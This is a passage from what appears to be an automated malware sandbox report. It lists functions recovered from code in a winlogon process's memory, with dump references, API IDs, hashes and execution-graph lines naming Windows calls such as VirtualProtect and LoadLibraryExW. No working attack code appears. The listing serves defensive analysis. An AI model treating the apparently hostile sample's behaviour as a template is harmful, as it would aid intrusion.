                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: bd53f42dd907213fd0dbf636d3fa9370317a7402f99812b588ab86bc55ced33c
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: FA010876624FA0D6E714DFBAE80815977A1F788F85F188835EA4A53728DF38C455CB40
                                                        Function 00000225DC642618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: e539cc0db90e06d70ee35d471f3c7cda66ac8f9e6424b185eea5754c5d75979f
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 9B71C43A20CBA199E766DFEE98483AE77A5F385B86F548065DE0B43B98DF34C505C700
                                                        Function 00000225DC61D178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 8fb73bca81c6f3bbd4f8502082ab705956e6a2f232d73ed21a21482d56adcd0a
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 6761C139E06EB0B2FEAA9BDC914C36D67A4F742793F10C525DB1A077A5DA38C841C200
                                                        Function 00000225DC642408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: 283e452f4dc49e6172955ca571761fce7bd5812099730cfdc5521d6b923f821b
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 6851182A20CBA5A1E67ADFEDA06C3BA7761F385782F658065DF4B43B49DA39C404C740
                                                        Function 00000225DC650724 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: bb11c882aadb6327b1bdfe44d72d638a204d06c6a5b0cbe3b30abc1ba246ec35
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: DE411A36324F50A5EB20DFA9E8487AA77A0F788B85F518021EE4D87788DF3CC445CB40
                                                        Function 00000225DC64D7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 427020b376e4c09a5661ea75c9ab15ac7223fe4e67b4b0c5e56b97b635498bde
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 2F111A3A608B9096D760CB5AF4842AAB7A5F7C9B85F548126EE8D83B59CF38C550CB00
                                                        Function 00000225DC6495F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 960868f448a03db2c21822a72a1f7356bddc94f91c19fb373935763ee4a634d0
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 4A11283A218B9092EB218F69F444259B7A4F788F95F588260EE8D07B69DF38C552CB00
                                                        Function 00000225DC64D77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: b3f187545fe17d623a24baa53dc8594969e2c9e7263f256d5a5530cdc78f252b
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: B6F0A72D728FA0E1EB059BD9F4486A93271FB48F92F64C5A5EA0A03B94CF38C945C740
                                                        Function 00000225DC64D728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00000225DC64D751
                                                        • TlsSetValue.KERNEL32(?,?,?,00000225DC64B50E,?,?,?,00000225DC64B969,?,?,?,?,00000225DC64BA1D), ref: 00000225DC64D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 642fbd2dda96894f580812c56a5652b05d9000be71fdb728acab7feffa0d9173
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 2CE09B69618E50F1EA454BDCF4482EC3262FB48B82F68D165E506073D4DE38C845C700
                                                        Function 00000225DC641C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 556b476d0f33124e422c36ad8569c178eac90306c37eaa587df2c31a934b8e95
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: A411E915A18FA091EA15CBBAA808159B7E0FB88FA1F598324DF59537A4EF3CC042C700
                                                        Function 00000225DC641268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 7f09943860e580462c33847df39b632ff2cb192837c8874d12c54d09fda5f2e5
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: A4E065B5A21A1096E7288FB6D80C34937E1FB88F0AF18C424C90907360DF7D8499CB80
                                                        Function 00000225DC641000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 7ded313ef4c4c6f9e5bd58421574de81f15ac3b5dffddee828e04f0291a31005
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: E3E01AB5621A50A7E7299FB6D80C35977E1FB8CF16F58C434C90907320EE3C8499CB10

                                                        Execution Graph

                                                        Execution Coverage:1.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1068
                                                        Total number of Limit Nodes:10
                                                        execution_graph 7790 202c0ae596d 7792 202c0ae5974 7790->7792 7791 202c0ae59db 7792->7791 7793 202c0ae5a57 VirtualProtect 7792->7793 7794 202c0ae5a91 7793->7794 7795 202c0ae5a83 GetLastError 7793->7795 7795->7794 8075 202c0ae28e8 8076 202c0ae292d 8075->8076 8077 202c0ae2990 8076->8077 8078 202c0ae3c70 StrCmpNIW 8076->8078 8078->8076 8079 202c0aee2e8 8080 202c0aee312 8079->8080 8081 202c0aeb980 _set_errno_from_matherr 13 API calls 8080->8081 8082 202c0aee331 8081->8082 8083 202c0aeb9f8 __free_lconv_num 13 API calls 8082->8083 8084 202c0aee33f 8083->8084 8085 202c0aeb980 _set_errno_from_matherr 13 API calls 8084->8085 8089 202c0aee369 8084->8089 8087 202c0aee35b 8085->8087 8086 202c0aed77c 6 API calls 8086->8089 8088 202c0aeb9f8 __free_lconv_num 13 API calls 8087->8088 8088->8089 8089->8086 8090 202c0aee372 8089->8090 7689 202c0aedbe4 7690 202c0aedbf0 7689->7690 7692 202c0aedc17 7690->7692 7693 202c0aefc7c 7690->7693 7694 202c0aefc81 7693->7694 7695 202c0aefcbc 7693->7695 7696 202c0aefcb4 7694->7696 7697 202c0aefca2 DeleteCriticalSection 7694->7697 7695->7690 7698 202c0aeb9f8 __free_lconv_num 13 API calls 7696->7698 7697->7696 7697->7697 7698->7695 7699 202c0ae4000 7701 202c0ae3f4d _invalid_parameter_noinfo 7699->7701 7700 202c0ae3f9d VirtualQuery 7700->7701 7702 202c0ae3fb7 7700->7702 7701->7700 7701->7702 7703 202c0ae4002 GetLastError 7701->7703 7703->7701 7703->7702 8091 202c0ae7efc 8098 202c0ae9470 8091->8098 8096 202c0ae7f09 8099 202c0ae9798 9 API calls 8098->8099 8100 202c0ae7f05 8099->8100 8100->8096 8101 202c0aeabb4 8100->8101 8102 202c0aeb4c4 _set_errno_from_matherr 13 API calls 8101->8102 8103 202c0ae7f12 8102->8103 8103->8096 8104 202c0ae9484 8103->8104 8107 202c0ae972c 8104->8107 8106 202c0ae948f 8106->8096 8108 202c0ae9740 8107->8108 8112 202c0ae975a __std_exception_copy 8107->8112 8109 202c0ae9b10 __vcrt_freeptd 6 API calls 8108->8109 8111 202c0ae974a 8108->8111 8109->8111 8113 202c0ae9b58 8111->8113 8112->8106 8114 202c0ae9930 __vcrt_FlsAlloc 5 API calls 8113->8114 8115 202c0ae9b86 8114->8115 8116 202c0ae9b90 8115->8116 8117 202c0ae9b98 TlsSetValue 8115->8117 8116->8112 8117->8116 6806 202c0aee47c 6807 202c0aee4a4 6806->6807 6808 202c0aee4b2 6806->6808 6807->6808 6822 202c0aead0c 6807->6822 6811 202c0aee500 6811->6808 6833 202c0af0db8 6811->6833 6812 202c0aee4de 6830 202c0af0e04 6812->6830 6816 202c0aee596 6819 202c0aed144 MultiByteToWideChar 6816->6819 6817 202c0aee544 6818 202c0aee579 6817->6818 6836 202c0aed144 6817->6836 6818->6808 6839 202c0aeb960 6818->6839 6819->6818 6823 202c0aead30 6822->6823 6829 202c0aead2b 6822->6829 6823->6829 6842 202c0aeb348 GetLastError 6823->6842 6829->6811 6829->6812 7078 202c0af14c4 6830->7078 6834 202c0aead0c 33 API calls 6833->6834 6835 202c0aee540 6834->6835 6835->6816 6835->6817 6837 202c0aed14c MultiByteToWideChar 6836->6837 6840 202c0aeb4c4 _set_errno_from_matherr 13 API calls 6839->6840 6841 202c0aeb969 6840->6841 6841->6808 6843 202c0aeb36a 6842->6843 6844 202c0aeb36f 6842->6844 6900 202c0aed6e0 6843->6900 6869 202c0aeb377 SetLastError 6844->6869 6904 202c0aed728 6844->6904 6850 202c0aeb416 6926 202c0aeacb4 6850->6926 6851 202c0aead4b 6892 202c0aee604 6851->6892 6854 202c0aeb3c3 6858 202c0aed728 _set_errno_from_matherr 6 API calls 6854->6858 6855 202c0aeb3b3 6856 202c0aed728 _set_errno_from_matherr 6 API calls 6855->6856 6859 202c0aeb3ba 6856->6859 6860 202c0aeb3cb 6858->6860 6916 202c0aeb9f8 6859->6916 6862 202c0aeb3e1 6860->6862 6863 202c0aeb3cf 6860->6863 6921 202c0aeb0b4 6862->6921 6866 202c0aed728 _set_errno_from_matherr 6 API calls 6863->6866 6866->6859 6869->6850 6869->6851 6893 202c0aead6e 6892->6893 6894 202c0aee619 6892->6894 6896 202c0aee638 6893->6896 6894->6893 7062 202c0aeeaac 6894->7062 6897 202c0aee64d 6896->6897 6898 202c0aee660 6896->6898 6897->6898 7075 202c0aecdb8 6897->7075 6898->6829 6935 202c0aed3ec 6900->6935 6905 202c0aed3ec try_get_function 5 API calls 6904->6905 6906 202c0aed756 6905->6906 6907 202c0aeb392 6906->6907 6908 202c0aed768 TlsSetValue 6906->6908 6907->6869 6909 202c0aeb980 6907->6909 6908->6907 6914 202c0aeb991 _set_errno_from_matherr 6909->6914 6910 202c0aeb9e2 6913 202c0aeb960 _set_errno_from_matherr 12 API calls 6910->6913 6911 202c0aeb9c6 HeapAlloc 6912 202c0aeb3a5 6911->6912 6911->6914 6912->6854 6912->6855 6913->6912 6914->6910 6914->6911 6944 202c0ae9e44 6914->6944 6917 202c0aeb9fd HeapFree 6916->6917 6918 202c0aeba2f 6916->6918 6917->6918 6919 202c0aeba18 6917->6919 6918->6869 6920 202c0aeb960 _set_errno_from_matherr 12 API calls 6919->6920 6920->6918 6953 202c0aeaf8c 6921->6953 6967 202c0aedd28 6926->6967 6936 202c0aed44d TlsGetValue 6935->6936 6942 202c0aed448 try_get_function 6935->6942 6937 202c0aed530 6937->6936 6939 202c0aed53e GetProcAddress 6937->6939 6938 202c0aed47c LoadLibraryExW 6940 202c0aed49d GetLastError 6938->6940 6938->6942 6939->6936 6940->6942 6941 202c0aed515 FreeLibrary 6941->6942 6942->6936 6942->6937 6942->6938 6942->6941 6943 202c0aed4d7 LoadLibraryExW 6942->6943 6943->6942 6947 202c0ae9e74 6944->6947 6952 202c0aeaebc EnterCriticalSection 6947->6952 6965 202c0aeaebc EnterCriticalSection 6953->6965 7001 202c0aedce0 6967->7001 7006 202c0aeaebc EnterCriticalSection 7001->7006 7063 202c0aeb348 33 API calls 7062->7063 7064 202c0aeeabb 7063->7064 7065 202c0aeeb06 7064->7065 7074 202c0aeaebc EnterCriticalSection 7064->7074 7065->6893 7076 202c0aeb348 33 API calls 7075->7076 7077 202c0aecdc1 7076->7077 7080 202c0af1521 7078->7080 7083 202c0af152d 7078->7083 7079 202c0ae7d60 _handle_error 8 API calls 7082 202c0af0e17 7079->7082 7080->7079 7081 202c0aeb960 _set_errno_from_matherr 13 API calls 7081->7080 7082->6808 7083->7080 7083->7081 8118 202c0ae2af8 8120 202c0ae2b55 8118->8120 8119 202c0ae2b70 8120->8119 8121 202c0ae34ac 3 API calls 8120->8121 8121->8119 7084 202c0aef478 7085 202c0aef480 7084->7085 7086 202c0aef495 7085->7086 7088 202c0aef4ae 7085->7088 7087 202c0aeb960 _set_errno_from_matherr 13 API calls 7086->7087 7089 202c0aef49a 7087->7089 7091 202c0aead0c 33 API calls 7088->7091 7092 202c0aef4a5 7088->7092 7090 202c0aeb840 _invalid_parameter_noinfo 30 API calls 7089->7090 7090->7092 7091->7092 7796 202c0ae8376 7797 202c0ae9538 __std_exception_copy 30 API calls 7796->7797 7798 202c0ae83a1 7797->7798 7093 202c0aeae74 7094 202c0aeae7c 7093->7094 7096 202c0aeaead 7094->7096 7098 202c0aeaea9 7094->7098 7099 202c0aed77c 7094->7099 7104 202c0aeaed8 7096->7104 7100 202c0aed3ec try_get_function 5 API calls 7099->7100 7101 202c0aed7b2 7100->7101 7102 202c0aed7bc 7101->7102 7103 202c0aed7c7 InitializeCriticalSectionAndSpinCount 7101->7103 7102->7094 7103->7102 7105 202c0aeaf03 7104->7105 7106 202c0aeaee6 DeleteCriticalSection 7105->7106 7107 202c0aeaf07 7105->7107 7106->7105 7107->7098 7108 202c0ae2a74 7110 202c0ae2ac8 7108->7110 7109 202c0ae2ae3 7110->7109 7112 202c0ae33f8 7110->7112 7113 202c0ae3490 7112->7113 7115 202c0ae341d 7112->7115 7113->7109 7114 202c0ae3c70 StrCmpNIW 7114->7115 7115->7113 7115->7114 7116 202c0ae1d08 StrCmpIW StrCmpW 7115->7116 7116->7115 7117 202c0ae7c50 7118 202c0ae7c71 7117->7118 7119 202c0ae7c6c 7117->7119 7121 202c0ae7d80 7119->7121 7122 202c0ae7e17 7121->7122 7123 202c0ae7da3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7121->7123 7122->7118 7123->7122 7799 202c0aebd50 7800 202c0aebd76 7799->7800 7810 202c0aebd8c 7799->7810 7801 202c0aeb960 _set_errno_from_matherr 13 API calls 7800->7801 7802 202c0aebd7b 7801->7802 7803 202c0aeb840 _invalid_parameter_noinfo 30 API calls 7802->7803 7805 202c0aebd85 7803->7805 7804 202c0aebdf9 7804->7804 7806 202c0aea4a0 13 API calls 7804->7806 7812 202c0aebe6c 7806->7812 7807 202c0aebee1 7809 202c0aeb9f8 __free_lconv_num 13 API calls 7807->7809 7811 202c0aebdec 7809->7811 7810->7804 7810->7811 7820 202c0aebf5c 7810->7820 7813 202c0aebf22 7811->7813 7814 202c0aeb9f8 __free_lconv_num 13 API calls 7811->7814 7812->7807 7817 202c0aebf44 7812->7817 7842 202c0aeef30 7812->7842 7815 202c0aeb9f8 __free_lconv_num 13 API calls 7813->7815 7814->7811 7815->7805 7818 202c0aeb860 _invalid_parameter_noinfo 17 API calls 7817->7818 7819 202c0aebf58 7818->7819 7821 202c0aebf8a 7820->7821 7821->7821 7822 202c0aeb980 _set_errno_from_matherr 13 API calls 7821->7822 7823 202c0aebfd5 7822->7823 7824 202c0aeef30 30 API calls 7823->7824 7825 202c0aec00b 7824->7825 7826 202c0aeb860 _invalid_parameter_noinfo 17 API calls 7825->7826 7827 202c0aec0e2 7826->7827 7828 202c0aead0c 33 API calls 7827->7828 7829 202c0aec1bf 7828->7829 7830 202c0aed614 5 API calls 7829->7830 7831 202c0aec1ed 7830->7831 7851 202c0aeba4c 7831->7851 7834 202c0aec270 7835 202c0aead0c 33 API calls 7834->7835 7836 202c0aec2a3 7835->7836 7837 202c0aed614 5 API calls 7836->7837 7838 202c0aec2cb 7837->7838 7873 202c0aebbc4 7838->7873 7841 202c0aebf5c 38 API calls 7843 202c0aeef48 7842->7843 7846 202c0aeef63 7843->7846 7847 202c0aeef4d 7843->7847 7849 202c0aeef92 7843->7849 7844 202c0aeb960 _set_errno_from_matherr 13 API calls 7845 202c0aeef57 7844->7845 7848 202c0aeb840 _invalid_parameter_noinfo 30 API calls 7845->7848 7846->7812 7847->7844 7847->7846 7848->7846 7849->7846 7850 202c0aeb960 _set_errno_from_matherr 13 API calls 7849->7850 7850->7845 7852 202c0aeba97 7851->7852 7853 202c0aeba75 7851->7853 7854 202c0aebaf0 7852->7854 7855 202c0aeba9b 7852->7855 7856 202c0aeb9f8 __free_lconv_num 13 API calls 7853->7856 7863 202c0aeba83 FindFirstFileExW 7853->7863 7857 202c0aed144 MultiByteToWideChar 7854->7857 7858 202c0aebaaf 7855->7858 7859 